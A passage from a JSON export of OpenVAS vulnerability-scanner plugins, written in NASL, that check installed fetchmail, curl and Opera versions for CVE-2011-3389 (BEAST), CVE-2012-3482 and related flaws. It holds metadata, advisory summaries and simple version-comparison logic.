exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64curl-devel\", rpm:\"lib64curl-devel~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-09-04T00:00:00", "type": "openvas", "title": "Mandriva Update for fetchmail MDVSA-2012:149 (fetchmail)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3482", "CVE-2011-3389"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831731", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for fetchmail MDVSA-2012:149 (fetchmail)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:149\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831731\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:39:57 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-3482\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_xref(name:\"MDVSA\", value:\"2012:149\");\n script_name(\"Mandriva Update for fetchmail MDVSA-2012:149 (fetchmail)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'fetchmail'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2)\");\n script_tag(name:\"affected\", value:\"fetchmail on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been found and corrected in fetchmail:\n\n Fetchmail version 6.3.9 enabled all SSL workarounds (SSL_OP_ALL) which\n contains a switch to disable a countermeasure against certain attacks\n against block ciphers that permit guessing the initialization vectors,\n providing that an attacker can make the application (fetchmail) encrypt\n some data for him -- which is not easily the case (aka a BEAST attack)\n (CVE-2011-3389).\n\n A denial of service flaw was found in the way Fetchmail, a remote mail\n retrieval and forwarding utility, performed base64 decoding of certain\n NTLM server responses. Upon sending the NTLM authentication request,\n Fetchmail did not check if the received response was actually part\n of NTLM protocol exchange, or server-side error message and session\n abort. A rogue NTML server could use this flaw to cause fetchmail\n executable crash (CVE-2012-3482).\n\n This advisory provides the latest version of fetchmail (6.3.22)\n which is not vulnerable to these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"fetchmail\", rpm:\"fetchmail~6.3.22~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fetchmailconf\", rpm:\"fetchmailconf~6.3.22~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fetchmail-daemon\", rpm:\"fetchmail-daemon~6.3.22~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"fetchmail\", rpm:\"fetchmail~6.3.22~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fetchmailconf\", rpm:\"fetchmailconf~6.3.22~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fetchmail-daemon\", rpm:\"fetchmail-daemon~6.3.22~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2020-04-27T19:22:28", "description": "The host is installed with Opera and is prone to information\n disclosure vulnerability.", "cvss3": {}, "published": "2011-09-09T00:00:00", "type": "openvas", "title": "Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310802333", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802333\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)\");\n script_cve_id(\"CVE-2011-3388\", \"CVE-2011-3389\");\n script_bugtraq_id(49388);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/45791\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1025997\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/1000/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_opera_detect_macosx.nasl\");\n script_mandatory_keys(\"Opera/MacOSX/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attackers to steal sensitive security\n information.\");\n script_tag(name:\"affected\", value:\"Opera version before 11.51.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to an error when loading content from trusted\n sources in an unspecified sequence that causes the address field and page\n information dialog to contain security information based on the trusted site\n and loading an insecure site to appear secure via unspecified actions related\n to Extended Validation.\");\n script_tag(name:\"solution\", value:\"Upgrade to Opera version 11.51 or later\");\n script_tag(name:\"summary\", value:\"The host is installed with Opera and is prone to information\n disclosure vulnerability.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/download/\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/MacOSX/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less(version:operaVer, test_version:\"11.51\")){\n report = report_fixed_ver(installed_version:operaVer, fixed_version:\"11.51\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-27T19:22:53", "description": "The host is installed with Opera and is prone to information\n disclosure vulnerability.", "cvss3": {}, "published": "2011-09-09T00:00:00", "type": "openvas", "title": "Opera Extended Validation Information Disclosure Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310802332", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802332", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Opera Extended Validation Information Disclosure Vulnerabilities (Windows)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802332\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)\");\n script_cve_id(\"CVE-2011-3388\", \"CVE-2011-3389\");\n script_bugtraq_id(49388);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Opera Extended Validation Information Disclosure Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/45791\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1025997\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/1000/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_opera_detect_portable_win.nasl\");\n script_mandatory_keys(\"Opera/Win/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attackers to steal sensitive security\n information.\");\n script_tag(name:\"affected\", value:\"Opera version before 11.51\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to an error when loading content from trusted\n sources in an unspecified sequence that causes the address field and page\n information dialog to contain security information based on the trusted site\n and loading an insecure site to appear secure via unspecified actions related\n to Extended Validation.\");\n script_tag(name:\"solution\", value:\"Upgrade to Opera version 11.51 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Opera and is prone to information\n disclosure vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/download/\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Win/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less(version:operaVer, test_version:\"11.51\")){\n report = report_fixed_ver(installed_version:operaVer, fixed_version:\"11.51\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-26T15:08:31", "description": "The host is installed with Opera and is prone to information\n disclosure vulnerabilities.", "cvss3": {}, "published": "2012-04-06T00:00:00", "type": "openvas", "title": "Opera Extended Validation Information Disclosure Vulnerabilities (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2020-04-22T00:00:00", "id": "OPENVAS:1361412562310802830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Opera Extended Validation Information Disclosure Vulnerabilities (Linux)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802830\");\n script_version(\"2020-04-22T10:27:30+0000\");\n script_cve_id(\"CVE-2011-3388\", \"CVE-2011-3389\");\n script_bugtraq_id(49388);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-22 10:27:30 +0000 (Wed, 22 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-06 12:13:30 +0530 (Fri, 06 Apr 2012)\");\n script_name(\"Opera Extended Validation Information Disclosure Vulnerabilities (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/45791\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1025997\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/1000/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_opera_detection_linux_900037.nasl\");\n script_mandatory_keys(\"Opera/Linux/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attackers to steal sensitive security\n information.\");\n script_tag(name:\"affected\", value:\"Opera version before 11.51 on Linux\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to an error when loading content from trusted\n sources in an unspecified sequence that causes the address field and page\n information dialog to contain security information based on the trusted site\n and loading an insecure site to appear secure via unspecified actions related\n to Extended Validation.\");\n script_tag(name:\"solution\", value:\"Upgrade to Opera version 11.51 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Opera and is prone to information\n disclosure vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/download/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Linux/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less(version:operaVer, test_version:\"11.51\")){\n report = report_fixed_ver(installed_version:operaVer, fixed_version:\"11.51\");\n security_message(port:0, data:report);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-02T21:10:58", "description": "The host is installed with Opera and is prone to information\n disclosure vulnerabilities.", "cvss3": {}, "published": "2012-04-06T00:00:00", "type": "openvas", "title": "Opera Extended Validation Information Disclosure Vulnerabilities (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2017-04-12T00:00:00", "id": "OPENVAS:802830", "href": "http://plugins.openvas.org/nasl.php?oid=802830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_opera_extented_validation_info_disc_vuln_lin.nasl 5940 2017-04-12 09:02:05Z teissa $\n#\n# Opera Extended Validation Information Disclosure Vulnerabilities (Linux)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attackers to steal sensitive security\n information.\n Impact Level: Application\";\ntag_affected = \"Opera version before 11.51 on Linux\";\ntag_insight = \"Multiple flaws are due to an error when loading content from trusted\n sources in an unspecified sequence that causes the address field and page\n information dialog to contain security information based on the trusted site\n and loading an insecure site to appear secure via unspecified actions related\n to Extended Validation.\";\ntag_solution = \"Upgrade to Opera version 11.51 or later,\n For updates refer to http://www.opera.com/download/\";\ntag_summary = \"The host is installed with Opera and is prone to information\n disclosure vulnerabilities.\";\n\nif(description)\n{\n script_id(802830);\n script_version(\"$Revision: 5940 $\");\n script_cve_id(\"CVE-2011-3388\",\"CVE-2011-3389\");\n script_bugtraq_id(49388);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-12 11:02:05 +0200 (Wed, 12 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-06 12:13:30 +0530 (Fri, 06 Apr 2012)\");\n script_name(\"Opera Extended Validation Information Disclosure Vulnerabilities (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/45791\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1025997\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/1000/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_opera_detection_linux_900037.nasl\");\n script_require_keys(\"Opera/Linux/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\noperaVer = NULL;\n\n## Get the version\noperaVer = get_kb_item(\"Opera/Linux/Version\");\nif(!operaVer){\n exit(0);\n}\n\n# Check for opera version < 11.51\nif(version_is_less(version:operaVer, test_version:\"11.51\")){\n security_message(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-04T14:20:10", "description": "The host is installed with Opera and is prone to information\n disclosure vulnerability.", "cvss3": {}, "published": "2011-09-09T00:00:00", "type": "openvas", "title": "Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2017-09-01T00:00:00", "id": "OPENVAS:802333", "href": "http://plugins.openvas.org/nasl.php?oid=802333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_opera_extented_validation_info_disc_vuln_macosx.nasl 7044 2017-09-01 11:50:59Z teissa $\n#\n# Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attackers to steal sensitive security\n information.\n Impact Level: Application\";\ntag_affected = \"Opera version before 11.51.\";\ntag_insight = \"Multiple flaws are due to an error when loading content from trusted\n sources in an unspecified sequence that causes the address field and page\n information dialog to contain security information based on the trusted site\n and loading an insecure site to appear secure via unspecified actions related\n to Extended Validation.\";\ntag_solution = \"Upgrade to Opera version 11.51 or later\n For updates refer to http://www.opera.com/download/\";\ntag_summary = \"The host is installed with Opera and is prone to information\n disclosure vulnerability.\";\n\nif(description)\n{\n script_id(802333);\n script_version(\"$Revision: 7044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-01 13:50:59 +0200 (Fri, 01 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)\");\n script_cve_id(\"CVE-2011-3388\",\"CVE-2011-3389\");\n script_bugtraq_id(49388);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/45791\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1025997\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/1000/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_opera_detect_macosx.nasl\");\n script_require_keys(\"Opera/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/MacOSX/Version\");\nif(!operaVer){\n exit(0);\n}\n\n# Check for opera version < 11.51\nif(version_is_less(version:operaVer, test_version:\"11.51\")){\n security_message(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:34", "description": "Check for the Version of curl", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for curl MDVSA-2012:058 (curl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-0036"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:831573", "href": "http://plugins.openvas.org/nasl.php?oid=831573", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for curl MDVSA-2012:058 (curl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in curl:\n\n curl is vulnerable to a SSL CBC IV vulnerability when built to use\n OpenSSL for the SSL/TLS layer. A work-around has been added to mitigate\n the problem (CVE-2011-3389).\n\n curl is vulnerable to a data injection attack for certain protocols\n through control characters embedded or percent-encoded in URLs\n (CVE-2012-0036).\n\n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"curl on Mandriva Linux 2011.0,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:058\");\n script_id(831573);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:18 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-0036\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2012:058\");\n script_name(\"Mandriva Update for curl MDVSA-2012:058 (curl)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of curl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"curl\", rpm:\"curl~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"curl-examples\", rpm:\"curl-examples~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcurl4\", rpm:\"libcurl4~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcurl-devel\", rpm:\"libcurl-devel~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64curl4\", rpm:\"lib64curl4~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64curl-devel\", rpm:\"lib64curl-devel~7.21.7~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"curl\", rpm:\"curl~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"curl-examples\", rpm:\"curl-examples~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcurl4\", rpm:\"libcurl4~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcurl-devel\", rpm:\"libcurl-devel~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != 